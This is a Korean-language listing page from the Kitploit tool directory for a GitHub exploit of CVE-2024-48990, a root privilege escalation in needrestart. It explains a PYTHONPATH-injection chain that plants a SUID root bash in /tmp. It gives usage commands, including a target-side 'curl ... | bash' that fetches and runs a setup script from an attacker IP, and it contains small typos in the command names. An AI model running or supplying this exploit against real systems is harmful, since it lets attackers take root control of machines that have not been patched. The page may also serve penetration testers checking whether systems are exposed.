Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-48990 — needsrestart setuid root shell에 대한 완전한 익스플로잇 | Kitploit
도구/GitHubGitHub/mladicstefan/cve-2024-48990
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed TeamingPayload Development
GitHubmladicstefan/cve-2024-48990

CVE-2024-48990

needsrestart setuid root shell에 대한 완전한 익스플로잇

저장소 보기
9개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-48990 익스플로잇

needrestart < 3.8 버전에서 PYTHONPATH 인젝션을 통한 로컬 권한 상승

작동 방식

  1. needrestart가 root로 실행되며 모든 프로세스를 스캔합니다.
  2. 우리의 Python 프로세스를 찾아 /proc/[pid]/environ에서 PYTHONPATH=/tmp/.m을 읽습니다.
  3. 우리의 악성 PYTHONPATH를 사용하여 Python을 root로 실행합니다.
  4. Python의 import가 /tmp/.m/importlib/__init__.so (우리의 악성 라이브러리)를 로드합니다.
  5. Python이 시작되기도 전에 .so의 생성자가 root로 실행됩니다.
  6. /tmp/rootbash에 SUID bash를 생성합니다.
  7. /tmp/rootbash -p를 실행하여 root 셸을 획득합니다.

핵심: needrestart는 권한 없는 프로세스의 환경 변수를 신뢰하여 인터프리터를 root로 실행할 때 사용합니다.

사용법

공격자:

root@kitploit:~
./compile.sh
python3 -m http.server 8000

대상:

root@kitploit:~
curl -sf http://10.10.14.109:8000/setup_exploit.sh | bash -s 10.10.14.109 8000
cd /tmp/.m && PYTHONPATH=/tmp/.m python3 e.py

e.py 프로세스는 다음 명령을 두 번째 터미널에서 실행하면 멈추고 root 셸을 생성합니다:

root@kitploit:~
sudo needsrestard

첫 번째 터미널에서 root 셸이 시작됩니다.

크레딧

Qualys Threat Research Unit - CVE-2024-48990

도구 다운로드